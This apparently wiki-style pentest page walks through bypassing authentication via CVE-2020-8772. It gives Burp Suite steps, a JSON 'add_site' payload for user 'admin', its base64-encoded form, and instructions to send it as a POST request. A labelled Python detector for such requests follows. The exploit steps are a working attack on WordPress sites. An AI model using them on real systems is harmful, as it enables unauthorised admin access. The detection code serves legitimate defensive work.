Authentication Bypass: Difference between revisions
[https://blog.pentesteracademy.com/cve-2020-8772-exploitation-under-3-minutes-594265b4e26a Bypass]
Revision as of 12 April 2022, 07:06
- Reload the target website and intercept the request using Burp Suite.
- Create the JSON payload and convert it to base64.
Payload: {"iwp_action":"add_site","params":{"username":"admin"}}
- echo '{"iwp_action":"add_site","params":{"username":"admin"}}' | base64 -w0
- Append the base64-encoded payload to the string mentioned in the exploit URL.
Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=
- Right-click in Burp Suite and click "Change request method" to convert the request from GET to POST.
- Place the payload created as POST request arguments.
- Click on Forward and turn off the intercept.
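For the defending side, the request built in the steps above has a recognisable shape: a POST body carrying `_IWP_JSON_PREFIX_` followed by base64 that decodes to JSON with `iwp_action` set to `add_site` and a `username` parameter. The following detection sketch is an added example, not part of the original page or the plugin's code; the function names, the verdict labels and the assumption that raw POST bodies are available from a proxy or WAF log are illustrative.

```python
import base64
import binascii
import json
import re
from urllib.parse import unquote

PREFIX = "_IWP_JSON_PREFIX_"        # marker string from the steps above
WATCHED_ACTIONS = {"add_site"}      # action used in the page's payload
PATTERN = re.compile(re.escape(PREFIX) + r"([A-Za-z0-9+/]+={0,2})")


def inspect_body(body):
    """Classify one raw POST body: None, or a dict with a verdict."""
    match = PATTERN.search(unquote(body))   # undo %3D-style encoding first
    if match is None:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    try:
        doc = json.loads(base64.b64decode(blob, validate=True))
    except (binascii.Error, ValueError):
        doc = None
    if not isinstance(doc, dict):
        return {"verdict": "malformed", "action": None, "username": None}
    params = doc.get("params")
    username = params.get("username") if isinstance(params, dict) else None
    action = doc.get("iwp_action")
    hit = (isinstance(action, str) and action in WATCHED_ACTIONS
           and username is not None)
    return {"verdict": "alert" if hit else "review",
            "action": action, "username": username}


# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "log=admin&pwd=example",
    PREFIX + "eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=",
    PREFIX + "bm90LWpzb24=",
]


def scan(bodies):
    """Return (index, finding) for every body that carries the prefix."""
    return [(i, f) for i, b in enumerate(bodies) if (f := inspect_body(b))]


if __name__ == "__main__":
    for index, finding in scan(SAMPLES):
        print(index, finding)
```

A `review` verdict means the prefix decoded to valid JSON with a different action; whether that traffic is expected depends on whether a legitimate management panel talks to the site.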